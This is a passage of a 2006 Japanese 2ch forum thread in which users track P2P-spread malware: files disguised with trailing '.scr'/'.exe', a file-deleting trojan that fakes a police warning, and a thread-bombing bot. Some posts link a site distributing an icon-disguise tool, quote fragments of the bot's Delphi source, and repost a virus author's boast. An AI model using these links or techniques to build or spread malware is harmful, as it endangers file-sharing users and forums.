同じ書式で毎週改変されながらウイルスが配信されるのか
読みたい奴は気をつけろよな

232 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:33:34 ID:Px9Qu7wQ0
だから亜種じゃなくて新種を作れと何回、、、

233 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:36:12 ID:KB3qXeJa0
それは阪在です

234 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:38:34 ID:/DfmLK810
ま た 大 阪 や

235 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:47:56 ID:6jgoSpIr0
流出元を特定できると豪語してる某社は何してるの?

236 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:01:03 ID:5TQ2Rn4K0
##[ドラマSP] 世にも奇妙な物語 15周年の特別編「今宵は超短編を含む15編の奇妙ワールド…恐怖,欲望,嫉妬,感動を贈る完全保存版!」 (640×480 DivX5.2.1 LameVBR).avi                                       .scr

起動したらなんか640*480の大きさの青い背景の画面がでてきて、京都県警がどうとか15秒後にこのソフトを終了とか強制終了するなとか出た。
で、15秒たって(時計見てきっちり計った)ソフトは終了したんだが「アンフェアなのは誰か?」ってタスクが出てきて消しても消してもでてくる。
メンドくなったのでタスクマネージャーから消したのだが、その>92の入ってたフォルダにあったmp3と圧縮ファイル(中身ゲーム)とドラマとかが全部消えてたってわけです

また新種?

237 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:17:29 ID:MDHpcmj20
>>236
.scr は無視リストに登録しなきゃね

238 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:25:17 ID:7+kLJWeB0
そう言えばどっかのサイトでそんなアイコン偽装ファイル作るツールを配布してたな
URLはすぐには判らないけど……

239 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:44:03 ID:kXe/PLuZ0
>>238
ここだな
ttp://dentu-tarou.hp.infoseek.co.jp/index-101.html
ttp://dentu-tarou.hp.infoseek.co.jp/P-DES%20DL.htm

ちなみにsymantecにトロイ認定されてる
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.denutaro.html

240 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:54:46 ID:5TQ2Rn4K0
http://dentu-tarou.hp.infoseek.co.jp/P-DES%20DL.htm

にあるAntinny.ZZて結構強力だなぁ・・・

241 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:56:45 ID:LPR9sjNF0
>>240
DLした瞬間にノートン先生に連行されま(´・ω・) スタ

242 :[名無し]さん(bin+cue).rar:2006/03/30(木) 22:59:34 ID:7+kLJWeB0
おお、そこそこ
前に見つけて一番下の奴はさすがに危険だと思ってVirusTotalに送ったんだ
シマンテックは対応してくれたんだな

243 :[名無し]さん(bin+cue).rar:2006/03/31(金) 00:09:01 ID:q9Ge765c0
これなんか明確に犯罪行為じゃないか
しかも京都府警の警告文を詐称してるんだろ
警察権力を騙ると、結構重罪だったはずだが…
通報しとこ

244 :[名無し]さん(bin+cue).rar:2006/03/31(金) 00:12:28 ID:EzQ3dW+o0
これも>>21>>22と同じか?
(一般コミック・雑誌) [マガジン] [2006-17] School Rumble スクールランブル No171.zip btHJFJMRAy 4,769,914 2bc156be1877193e274cdce64a7968e1

245 :[名無し]さん(bin+cue).rar:2006/03/31(金) 00:14:47 ID:X470rkZ30
>>240
なにこれ?危険度も何も全部実行不能なんだけど。

246 :[名無し]さん(bin+cue).rar:2006/03/31(金) 00:15:31 ID:q9Ge765c0
しかし、temp6鯖は地味に攻撃されてるんだな

247 :[名無し]さん(bin+cue).rar:2006/03/31(金) 00:43:32 ID:h/mFFwYe0
とりあえずサイト丸ごと保全しておいた。

248 :[名無し]さん(bin+cue).rar:2006/03/31(金) 01:31:13 ID:5RxIVamW0
なにこれ、すげーむかついたから
infoseekの運営に通報した


249 :[名無し]さん(bin+cue).rar:2006/03/31(金) 02:08:40 ID:tHQfHuaC0
 :   :: ゚   : 。   〜  彡ミ
:  ゚     :。   〜  彡ミ彡ミ
  : 。 〜   : ゚  :: 彡ミ彡ミミミ
: . ::: 。 〜 : : .. ゚ 彡彡ミ彡ミミミ
. ゚ 〜 :: .  : :. 。  ;:ヽ|i゚∀゚ i|ノ アヒャヒャヒャ
゚  ::  ゚〜 : 。  :  : : |i!iハlハl!|


250 :[名無し]さん(bin+cue).rar:2006/03/31(金) 03:16:41 ID:CdQxIMm20
>>236
だから、 .scr は踏むな、と何度同じことを(ry

251 :[名無し]さん(bin+cue).rar:2006/03/31(金) 13:35:33 ID:z0K3iwjN0
まあどんなウィルスも永田オルタナティブには敵わねぇーナ

252 :[名無し]さん(bin+cue).rar:2006/03/31(金) 13:40:26 ID:sUTOG33Z0
>>207が作者っぽいなと感じるのは俺だけ?

253 :[名無し]さん(bin+cue).rar:2006/03/31(金) 14:05:02 ID:5zYOGlB50
山田は駄ウイルスだろ。人生破壊度ではキンタマに遠く及ばない。

254 :[名無し]さん(bin+cue).rar:2006/03/31(金) 15:24:16 ID:vqJEtQ9f0
今後の発展に期待・・・いや、警戒が必要だけどな。

255 :[名無し]さん(bin+cue).rar:2006/03/31(金) 19:16:13 ID:1eKeCUqH0
永田オルタって何。党執行部を解体させるウイルスかなんかか。

256 :[名無し]さん(bin+cue).rar:2006/03/31(金) 19:33:38 ID:81Hx8V3d0
永田議員辞職じゃぬるいよね
免職&除籍くらいすべきだろう

257 :[名無し]さん(bin+cue).rar:2006/03/31(金) 19:42:36 ID:BqZ3pFue0
>>250
ちなみにそれはどうなるの?
一度その画面みた記憶が・・・(ry

258 :[名無し]さん(bin+cue).rar:2006/03/31(金) 23:04:33 ID:OdCc6VDR0
3月24日発売のエロゲのNoCDパッチ群がやらかしてるかも知れんね

【18禁ゲーム】[060324][Silver Bullet] 雪影-setsuei- 初回限定版 [NoDVD化パッチ]修正版.rar 195,300 f61bcb87234e34e3e417cf6f0da7e0f9
【18禁ゲーム】[060324][Lyric] レーベンスエンデ [NoDVD化パッチ].zip 195,179 02000316c526f4d4633befe9799767f0
とか、サイズが195KBあたりの奴。wdiffで作ったように偽装されてる

259 :[名無し]さん(bin+cue).rar:2006/03/31(金) 23:27:03 ID:lsw7s4fh0
ふと思い出したんだけど、なみかれだかナミカレとかいうのあったよね。
あれってまだ流れてんのかな・・・

260 :[名無し]さん(bin+cue).rar:2006/03/31(金) 23:34:18 ID:L2UrIagw0
           __        /: : : : : : : : : : : (
          〈〈〈〈 ヽ     /: : : : ::;:;: ;: ;:;: ; : : : ::ゝ
          〈⊃  }     {:: : : :ノ --‐' 、_\: : ::}
   ∩___∩  |   |      {:: : :ノ ,_;:;:;ノ、 ェェ ヾ: :::} >1
   | ノ      ヽ !   !   、  l: :ノ /二―-、 |: ::ノ   
  /  ●   ● |  /   ,,・_  | //   ̄7/ /::ノ
  |    ( _●_)  ミ/ , ’,∴ ・ ¨  〉(_二─-┘{/
 彡、   |∪|  /  、・∵ ’  /、//|  ̄ ̄ヽ
/ __  ヽノ /         /   // |//\ 〉
(___)   /         /    //   /\ /

                         _ /- イ、_
               ,       /: : : : : : : : : : : (
              ゚ + `    /: : : : ::;:;: ;: ;:;: ; : : : ::ゝ
            ’, ’,∴ ・ ¨ {:: : : :  : : ::;:;: ;: ;:;: ;: ::}
   ∩___∩    ! ii  ’,∴  ェェ ( : : : ::;:;: ;: ;:;: ; : ::::} >1
   |      : : ;: ヽく^⌒| | ! ,・,,  (_l__\(: ::;:;: ;ヽ: ; : ::ノ
  /      : : ;: |く^⌒!|| , ,,・_(_ヽ;:;:)ヽ: ::;:;: ;:; ::ノ
  |       : : ::;:ミ ::;:| !   ∴ ・ ¨C〉 (_二:;: ;::;:/
 彡、     : : ::;:/⌒ ノ||!、 ’  ・∵ (、//|    ̄ヽ
/ /       : : ::;:/!!       /   // |//\ 〉
(_/     : : ::;:/'' ̄         / 


261 :[名無し]さん(bin+cue).rar:2006/03/32(土) 00:05:44 ID:VZd1Xd+S0
2chブラウザの日付が3月32日になってる。新手のウィルスか。

262 :[名無し]さん(bin+cue).rar:2006/03/32(土) 00:08:38 ID:Os/iYpHp0
ねただろ
http://www.2ch.net/

263 :[名無し]さん(bin+cue).rar:2006/03/32(土) 00:18:52 ID:n+DIRuCt0
おまいら大変だ
ttp://internet.watch.impress.co.jp/static/uocchi/2006/04/01/winny.htm

264 :[名無し]さん(bin+cue).rar:2006/03/32(土) 00:23:28 ID:CreQ9mUb0
>>262-263
定番だな


265 :[名無し]さん(bin+cue).rar:2006/03/32(土) 02:43:41 ID:3g1Yo9VU0
ずいぶん下世話なネタを使うようになったな

266 :[名無し]さん(bin+cue).rar :2006/03/32(土) 04:51:24 ID:p5hDIXdQ0
おい糞ども聞いてくれよ。
わーむでヒットせんかったからにゅいるすで検索してやっとたどり着いた。
にゃーむって何だよ?
ダメーポのにゃむ先輩を思い出したじゃねぇかよ。
よりによってあんな糞ゲーを。
今まで気分よくネットしてたのによ、この不快感どうしてくれるの?
ちょい、責任者出せや。
それと野豚氏ね

267 :[名無し]さん(bin+cue).rar:2006/03/32(土) 05:31:15 ID:XJ2zhF6J0
           ,...::‐:::''':::‐:::''':::‐:..,
         /:::::::::,. - ‐ -  .,::::、ヽ
        ./:::::, ´        `ヽ:::::ヽ
       j::::::::i   ,. -‐,, ‐-  .,  i::::::::l
       i:::::::|,...:´::/::/:/ i::i::iヽ:::l`:.|:::::::l
       .i:::::i_|::::i::i:::i::|:i|, 、l_l:|::l:::|:::l:|:::::::l
      ./::::::l::l_L|+|''i"|i  ノl/''l‐ノLl_|:::::::l
      ,:'/::l:::l:ト ',o:::::l゛ `  lo::::ヽノ/;:::|::::'i
   -‐''゛/::/::l::::ゝl:::::::::l    l:::::::::l/イ::::l::l:;:::ヽ,      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ,,_ ,,.、 '',/:::::l::::l,.∪ ̄  丶   ̄∪,/:::::l::::ヽヾ,,`''   < そんなこと言うなんてヒドイですぅ…
    ,.、'/:::::::::l:::l:::\  ⊂ニ⊃  ., /:::/::::::::ヾ,_ `'''‐    \_______________
 ‐'''" //:::::/:::/ヽl::::::`:.,    , :"://::::::ヽ::::ヾヽ'‐
   .i:i::::::/::::::l::::::::::::l:,‐| ` ´ .ト,:::l::::ヽ:::::::ヽ::::ii';',
   i:i:::::/|::::l::l_;: ''" l'     .'/゛'' ;_ヽ::::::l l:::l l:l
   i:ii::::i:;< ´、    l "´ `"/    ,` >l:::l:::l l;'
   ';lヽ/  \\   .l    /   // ヽlノ
     i    \\  .l  ./  //    .〉
     .i    ヽ`' .,゙' 、. l /,. ‐'',. '"/    /
     i     ll  >'‐_,'l/,.<´ /     i
     .i     l,.‐,´'"ヽ/ 〈/'' ` 〉     i
      |     l l .//⌒ヾ、//     .i

268 :[名無し]さん(bin+cue).rar:2006/03/32(土) 05:45:31 ID:+v9Hyl9Q0
|/.:.:.:/.:.:.:.:/.:.:.:.:.:.:.:/.:.:.:.::/.:.:.:.:.:/<ヽ.:.:i.:.:|.:.:.:.:.:.:.:.:.:.:.:|
 .|i.:.:.:/.:.:.:.:/.::.:.:.:.:.:/.:.:.:.:/.:.:.:/;;//iヘvwv| :|.:.:.:.:.:.:.:.:.:.:.:|
 |.:.://.:.::.::/.::.:.:.:.:/.:.:.:/:.:.:/;;////   .|.:|.:.:.:i.:.:.:.:i.:.:.:|
 |:.:| |.:.:.::.:i.:.:.:.:.:::i.:.:.://.:::../;;;/.//    |:.:|i.:..:i.:.:.:.:i.:.:.:|
 |:.| .|.:.:.::.:i.:.:.:.:.:i.:.:/ー;;/ソ/ // -==、_.|:.| |.:.::i.:.:.::i.:.:::|
 .|:| .|.:.:.:.::i.:.:.::.:i.:.:ム;r-y,ネ'  // -_、,,,,__ .|:;ヘ|.:..:i.:.:.:i.::..:|
  ii |i :i.:.::i.:.:.:.:|ヤケiテうト`  ,/'´  '´,ケネデヌ;., |.:.:i.:.:/|.::.::|i   あははははははあはははははあははははは
 \ ̄ ̄ ̄ ̄\|;:::::`}:| /     |{::::::f;;イソ:.i.:.イ./.:.:.::|i
   ┐      \:,ソ        .セ_:::::ソ/.:.:/.|/.:.:.:.:|.i   
  .|i|i.. ┐      \    ,     .~ ̄ /イi.:.:|i.:.::.:.:.| .i.
  .|i |:i.:.:.: .┐      \ __      ' /V::./.:.:.:.:.:|| i
  |i .|.:i.:.:.:.:i .┐      \__丿    , r'´.:::|.:.:/.:.:..:.::|| i
 |i |:.:i.:.:.::.:.:i;:; .┐      \ , . r'´;:;:i:;:;;:/:/.:.:.:.::.:.:|.:| ii
. |i |;:;:;i:;;:;:;:;:;:i.:|_, .i ┐      \ .:ト、;;;;i;;;//;:;:;:;:;:;:;:|;:;::| .ii
.|i .|;:;:;:ト;:;:;:;:;:;:;:i:|   ┐      \  \/';:/;:;:;:;:;:;:i;:;:::|  .ii
|i .|;:;:;:小;:;:;:;:;:;:;:i;:;::|_,,...,┐      \ :/;::/;:;:;:;:;:/:|;:;:;::|  .ii
  ノ'´ |:ハ;:;:;:;:;:;:;:;:i :|`ヽ,   ┐      \,;:;:;:;:;;:/;:/\;::|  ii
. /   |:| .ヽ,;:;:;:;:;:;:;i:|= =`=、  ┐      \;:/;::/   \  .ii
/   |:|  ヾ;:;:;:i:;:;::|-=テ=Yd .┐      \/ー-   ヽ ii
    |:|   ヾ;;;;i;;;;;;| r彡ハ:/ ハア .┐      \     |

269 :[名無し]さん(bin+cue).rar:2006/03/32(土) 08:34:14 ID:Mo13NPMs0
結婚してくれ

270 :[名無し]さん(bin+cue).rar:2006/03/32(土) 13:36:36 ID:rRYnizxY0
ニューワームならニョームか

271 :[名無し]さん(bin+cue).rar:2006/03/32(土) 14:30:46 ID:7MHWa0Kz0
>>268 これか
ttp://schooldays.0verflow.com/sd_index.html
ttp://www.uploda.org/uporg352738.mp3


272 :SKNfb-07p3-27.ppp11.odn.ad.jp:2006/03/32(土) 20:21:22 ID:XEGjjN7z0
↑おまえなに言ってんの?

273 :[名無し]さん(bin+cue).rar:2006/03/32(土) 20:34:13 ID:p5hDIXdQ0
↑お前新種のにゃむ先輩に犯られたのか?

274 :KHP222000019100.ppp-bb.dion.ne.jp:2006/04/02(日) 10:27:56 ID:0K8gtijP0
蟹工船

275 :[名無し]さん(bin+cue).rar:2006/04/02(日) 11:21:43 ID:p1WaW4+o0
>>268
エイプリルフールネタで、アヒャヒャヒャとエンドレスで笑うFLASHもあったな

276 :[名無し]さん(bin+cue).rar:2006/04/02(日) 12:14:59 ID:OinazBGq0
share (zipの後ろで改行してあります)
(一般コミック・雑誌) [サンデー] [2006-18] ハヤテのごとく! 第74話 【姉は一級建築士】,zip
                                                                                      .exe AblanurhvWesZ7Isw 5,469,138 d8e4605e09c2d5d69454027d7f32da10180692a0
アイコンの偽装あり。avast!では無反応。さっさと消去してしまったので詳細は不明。

277 :星方天使天環 ◆W/UhU0N3pg :2006/04/02(日) 13:08:29 ID:pb6jEaQ+0
>>276
shareもなのか・・・

winnyだけでおなか(virus)いっぱい

278 :[名無し]さん(bin+cue).rar:2006/04/02(日) 13:21:31 ID:uurKIYE80
>273
その書き込み、爆撃ウイルスの亜種。


……とレスしたおまいもウイルスだったりして(((((;゚д゚))))ガクガクブルブル

279 :[名無し]さん(bin+cue).rar:2006/04/02(日) 13:34:07 ID:PERiuEAa0
そんな>278のIDが傘スレにあった件

(((( ;゚Д゚)))ガクガクブルブル

280 :[名無し]さん(bin+cue).rar:2006/04/02(日) 13:56:31 ID:7KRq5WXb0
なぜレビトレが・・・・・・
10 :zaq3d2e997f.zaq.ne.jp [age] :2006/04/02(日) 13:37:00 ID:w+iTJDQ90
AE86 4A-G

281 :[名無し]さん(bin+cue).rar:2006/04/02(日) 14:23:51 ID:4AzLNHS70
>279
よければ、どこか教えてくれ。

282 :z57.58-98-194.ppp.wakwak.ne.jp:2006/04/02(日) 15:36:19 ID:fv0mkmgc0
オリジン弁当ウマー

283 :husianasann:2006/04/02(日) 15:45:59 ID:DOUJI23b0
釘宮理恵はウマー

284 :[名無し]さん(bin+cue).rar:2006/04/02(日) 15:46:54 ID:DOUJI23b0
orz

285 :[名無し]さん(bin+cue).rar:2006/04/02(日) 15:56:57 ID:fMn0KD870
これは恥ずかしい。

286 :[名無し]さん(bin+cue).rar:2006/04/02(日) 18:01:30 ID:u67JyTxt0
>>284
NがあればDOUJINだったのに・・・

287 :[名無し]さん(bin+cue).rar:2006/04/02(日) 18:21:47 ID:J/tQtdFz0
これはひどい


288 :[名無し]さん(bin+cue).rar:2006/04/02(日) 21:52:57 ID:1Sp7IDOe0
保守

289 :[名無し]さん(bin+cue).rar:2006/04/02(日) 22:12:30 ID:5BVDxmSI0
書き込みウィルスはボットか?
臨機応変に対応してくるな。

290 :[名無し]さん(bin+cue).rar:2006/04/02(日) 22:14:51 ID:Rac86CLf0
DOUJI23b0バロスwwwwwwwwwwwwwwwwwなの

291 :[名無し]さん(bin+cue).rar:2006/04/02(日) 22:26:37 ID:n4bCj6oX0
じわじわと住人が減りつつあるみたいでおめでとう

292 :[名無し]さん(bin+cue).rar:2006/04/03(月) 00:32:21 ID:IbzzdK8g0
むしろありがとう

293 :[名無し]さん(bin+cue).rar:2006/04/03(月) 01:00:04 ID:8nMGkRSc0
爆撃先がころころ変わった亜種がでてるのにターゲット解析とかしないしな。
このスレ使えネ。存在意義がない。

294 :[名無し]さん(bin+cue).rar:2006/04/03(月) 01:12:46 ID:qPsvoPQY0
タイトル変わったからかなー

とりあえずNoCD片っ端から調べれば、当たりそうな気がする

295 :山崎渡:2006/04/03(月) 03:02:12 ID:vQowBtcq0
こやまきみこのきょぬーウマー

296 :[名無し]さん(bin+cue).rar:2006/04/03(月) 10:29:43 ID:aT4LRo490
このスレタイじゃな・・・。新しい人も来ないし情報も来にくいし。
もちろんこのスレより>>293の方が使えない上に存在意義がないけど。

297 :[名無し]さん(bin+cue).rar:2006/04/03(月) 11:00:44 ID:oGKW5e0C0
遥か昔に却下されたスレタイ案でスレ立てした>>1が悪い

298 :[名無し]さん(bin+cue).rar:2006/04/03(月) 11:13:19 ID:vRIXUdZU0
自分では何もせずに文句だけ言うウイルスもあるんだな

299 :[名無し]さん(bin+cue).rar:2006/04/03(月) 13:47:18 ID:6yPecLCL0
>>276
シマンテックに提出しておいた。

一回上げれば人も集まるんじゃないのか?

300 :[名無し]さん(bin+cue).rar:2006/04/03(月) 15:09:31 ID:fdRBXsz30
エロゲスレにも書いたんだけど
[NoCD][060407]かみさまの宿っ!_NODVD.rar 194,946 c132da4153aa1e702a5e2658c3a799b670e71370
にfusiana爆撃のソース(メインプログラムのみ、pascal)が入ってた。

これによると Timer1.Interval := 80000; なので爆撃は80秒に1回、
kakiko(host,bbs,getdat(listbox2.Items.Strings[200 + Random(100)]),'fusianasan','age',ListBox3.Items.Strings[Random(152)]);
なのでおそらく200〜300番に下がってるスレ(ランダム)に
リソース、RC Data/TFORM1内に入ってる152種類定義されている文字列のいずれかを書き込む。

作者がソースを公開した理由は不明…亜種を呼び込むため?

301 :[名無し]さん(bin+cue).rar:2006/04/03(月) 15:13:48 ID:3Z3fTj/80
>>300
そのソースが本物かどうか確認したのか?

302 :[名無し]さん(bin+cue).rar:2006/04/03(月) 15:28:17 ID:5I8z8E+K0
あげちゃうぞ

303 :[名無し]さん(bin+cue).rar:2006/04/03(月) 15:35:27 ID:fdRBXsz30
>>301
本物もなにも普通に読めばfusianaで爆撃するプログラムになってるよ

ただもちろん爆撃用テキストは物によって違うから
書き込む条件も物によって変わってる可能性はある

304 :[名無し]さん(bin+cue).rar:2006/04/03(月) 15:52:38 ID:izRAP0wi0
にゃむ先輩

305 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:14:04 ID:WziN9WoB0
ID:fdRBXsz30 作者本人の予感

306 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:16:01 ID:OMSb6nNf0
>>305
ウイルス作者、キターーーーーーー

307 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:17:47 ID:fdRBXsz30
んなわきゃない
>>300のpascalは厳密には間違いでdelphiのようだ
使ったことないんでわからんかった

308 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:21:33 ID:3Z3fTj/80
>>303
そうみせかけたフェイクかもしれない。
他の重要な機能があってそれは入ってないとか。

まぁビルドしてみればわかるんだが。


309 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:36:44 ID:fdRBXsz30
>>308
メインのソースだけでリソースがないから適当に用意しないとビルドは出来ないんじゃないかな
少なくともソース中で使ってる文字列やファイル名はそのまんまexeでも使われてるよ
BAMBOO_U っていうunit名も一緒
デバッガでざっと見たとこ他に怪しい機能もないと思う

310 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:56:27 ID:mBUvULEb0
スレタイを狙った機能は入ってない?
スレ順の撹拌を狙ったダケなのか....

でも、4桁数字スレへの爆撃は止まってるんだよねー

311 :[名無し]さん(bin+cue).rar:2006/04/03(月) 16:57:57 ID:mBUvULEb0
すまん。 >>310 補足...
フシアナageのIPがいくつか焼かれたら、4桁数字爆撃が止まったと言う意味です

312 :softbank219057150195.bbtec.net:2006/04/03(月) 17:58:34 ID:RkqTGAw60
熊田曜子はガバガバだったわwwww

313 :[名無し]さん(bin+cue).rar:2006/04/03(月) 18:31:43 ID:zv8up58r0
http://oshiete1.goo.ne.jp/kotaeru.php3?qid=1492803
ワロス



314 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:03:43 ID:bfoE5I1B0
> ID:fdRBXsz30

通報しといた。
ウィルスは単純作成でも逮捕対象になるからさ。
調子に乗ってここに書き込んだのが運の尽きだなm9(^Д^)プギャーーーッ

晒しage

315 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:04:47 ID:OHgqENPl0
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/


316 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:15:35 ID:KRsaXH/c0
>>276
話題を逆行して悪いんだがこれウイルスじゃねえ。
むしろなんだこれ。
http://vista.x0.to/img/vi4405910593.jpg
だとさ。ファイル増減、レジストリ、プロセス共に感染した形跡はなし。

317 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:16:36 ID:eJ2Fkc090
ウィルス仕込む奴もなかなかいいセンスもってるね

4 :z57.58-98-194.ppp.wakwak.ne.jp :2006/04/03(月) 16:28:35 ID:MfljfowE0
はぁ?


5 :z57.58-98-194.ppp.wakwak.ne.jp :2006/04/03(月) 18:58:33 ID:MfljfowE0
↑おまえなに言ってんの?




318 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:16:36 ID:ud96stpX0
いまNHKで「山田オルタナティブ」が取り上げられてる。

319 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:31:31 ID:6yPecLCL0
>>316
ジョークなんとかというのだね。
問題なしとシマンテックからメールが来たよ。
なんの反応もしないノートンと警告を出すavast!はどっちが良いの
であろうか?

320 :[名無し]さん(bin+cue).rar:2006/04/03(月) 19:35:41 ID:t44pxMig0
>>319
Klezの流行った頃、メールプレビューだけで感染ってあったじゃない?
iframeのやつ。

そのiframeのが入っててウィルス本体のないメールを、
バスター先生は警告出し、ノートン先生はスルーだったっけねぇ。

321 :z57.58-98-194.ppp.wakwak.ne.jp:2006/04/03(月) 20:37:56 ID:MfljfowE0
保守

322 :[名無し]さん(bin+cue).rar:2006/04/03(月) 20:45:43 ID:OHgqENPl0
これもウィルス君かよ

323 :[名無し]さん(bin+cue).rar:2006/04/03(月) 20:47:40 ID:LouWGDKS0
保守

324 :[名無し]さん(bin+cue).rar:2006/04/03(月) 20:52:51 ID:vEWSqPu60
もはやウィルスなのか釣りなのか判別できん

325 :[名無し]さん(bin+cue).rar:2006/04/03(月) 20:54:20 ID:O234xeBJ0
ブルースおまえもか!

326 :[名無し]さん(bin+cue).rar:2006/04/03(月) 21:08:19 ID:qPsvoPQY0
■ウィルス爆撃相談所&焼き処2【RockBBQ】
http://qb5.2ch.net/test/read.cgi/sec2chd/1144022103/19

19 名前:reffi@報告人 ★[sage] 投稿日:2006/04/03(月) 20:17:47 ID:???0
う〜む、これはID認証導入を検討しないといけない時期に来たのかもしれません。
過剰アクセスは技術的に不可能そうには見えないけど無差別ばらまき書き込みに
対してはこれくらいしか有効な対策はないし


※必要でしたら運用スレに議論スレ建てます。



327 :[名無し]さん(bin+cue).rar:2006/04/03(月) 21:12:59 ID:DkLfm36j0
ttp://www.excite.co.jp/News/world/20060403192148/Kyodo_20060403a321010s20060403192151.html
高速インターネット・サービス契約者の62・2%に
当たる約771万人分の個人情報が不法に流出...

もはやウイルスなんか時代遅れの最先端IT先進国だなぁ。
ノーガード戦法か...。

328 :[名無し]さん(bin+cue).rar:2006/04/03(月) 21:22:42 ID:KRsaXH/c0
>>327
馬鹿じゃねえの、今度はどこだ大手ISPか、と思ったら・・・。
まぁ日本は笑える立場にないが62%ってのは凄いな。

329 :[名無し]さん(bin+cue).rar:2006/04/03(月) 21:29:58 ID:Uv6wkdIY0
何やら不審なカキコを見つけたのだが、大丈夫か?


http://tmp6.2ch.net/test/read.cgi/download/1143896647/


158 [名無し]さん(bin+cue).rar sage New! 2006/04/03(月) 20:22:31 ID:aSa7F9dA0
対Lime/Cabos用新型ウイルス完成しました!

名称:試式 対電脳細菌兵器一号一型
通称:蜜柑

機能はWORM_ANTINNYやTROJ_AGENT.AZWと同様の機能を
有しますが、Lime/Cabosの共有フォルダを探し出しその中に
検索用語の中で最も頻出するファイル名で、自身をコピーした
mp3・avi・zip・exeに偽装したファイルを作成し拡散します。

他にメーラーに登録されているメールアドレスへ向けて、自身を
コピー・偽装したファイルを送りつけます。

試験的にLime/Cabos、Winny、Shareに放流しましたので、お楽しみください。


330 :z57.58-98-194.ppp.wakwak.ne.jp:2006/04/03(月) 22:04:56 ID:MfljfowE0
蟹工船

331 :[名無し]さん(bin+cue).rar:2006/04/03(月) 22:57:29 ID:LCrL7xBl0
韓国、中国、台湾は、個人レベルでも危機意識低くて、結構トロイにやられてるよ。
コツコツポートスキャンしてくるのは、ここらの国が多い。
急速にネットが広がりすぎて、管理が追いついてないんじゃない?

332 :[名無し]さん(bin+cue).rar:2006/04/03(月) 22:59:55 ID:/P4oTzIE0
>>329
事実だったら全文コピペしたお前さんも・・・

333 :ea-west-12-41.dsn.jp:2006/04/03(月) 23:35:32 ID:WySWTCff0
オレ様が1000取った!>>999ぷぎゃー

334 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:41:24 ID:ud96stpX0
バリエーションが豊富になってきたな。

335 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:45:16 ID:afWkFa7B0
開発は長期休みに限るな

336 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:51:24 ID:Cz9b2vWa0
いい加減にしてほしいって感じだね。
作者はDownload板を潰すためにやっているのだろうか?

337 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:52:25 ID:yAX3zFdK0
>>336
当たり前だろ。

338 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:54:18 ID:OGvf4wug0
ウイスル作者に思想だの目的だのあるわけない

339 :[名無し]さん(bin+cue).rar:2006/04/03(月) 23:56:04 ID:nw4gQFJy0
書き込み時Captcha(画像)認証制導入議論スレ
http://qb5.2ch.net/test/read.cgi/operate/1144071322/l50

画像認証という話も出てきたわけだが。

340 :ea-west-12-41.dsn.jp:2006/04/03(月) 23:56:54 ID:WySWTCff0
だな。ほとんどはオレ様のような自演だ

341 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:00:52 ID:5+ta3vnH0
俺もやろうと思ったが止めたのにwwwおまえというやつは

342 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:01:26 ID:/RF8qFuZ0
>>339-340
不覚にもワロタ

343 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:01:52 ID:aMD4sjWg0
NGNameに .1 .2 .jp を登録するとすっきりする

344 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:02:33 ID:L2XWI+rG0
>>336
136 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2006/04/03(月) 23:38:07 ID:2XvPztj10
download板なんて今までもそしてこれからも見ることもみねーーーーから
認証でもなんでも導入しちゃっていいよ。良識あるヤツは誰も困らん


そして、こういう話になるわけだ罠。

345 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:04:38 ID:wRG9EdJZ0
.n .cも追加

346 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:49:57 ID:/k7qUpt50
書き込み時Captcha(画像)認証制導入議論スレ
http://qb5.2ch.net/test/read.cgi/operate/1144071322/

ついにここにまで・・・すごい勢いで爆撃された
記録的かも

347 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:56:29 ID:UV44qXm80
(((;゚д゚)))

348 :[名無し]さん(bin+cue).rar:2006/04/04(火) 00:57:21 ID:aOfMuEGn0
【2ch】書き込みにID認証制を導入―登録型サイトへ移行か
http://live22x.2ch.net/test/read.cgi/news/1144069170/

ニュー速に晒された途端爆撃されたぞ

349 :[名無し]さん(bin+cue).rar:2006/04/04(火) 01:05:39 ID:dsVjTyBU0
>>346
207で終わりか(((;゚д゚)))

350 :[名無し]さん(bin+cue).rar:2006/04/04(火) 01:07:02 ID:/k7qUpt50
>>349
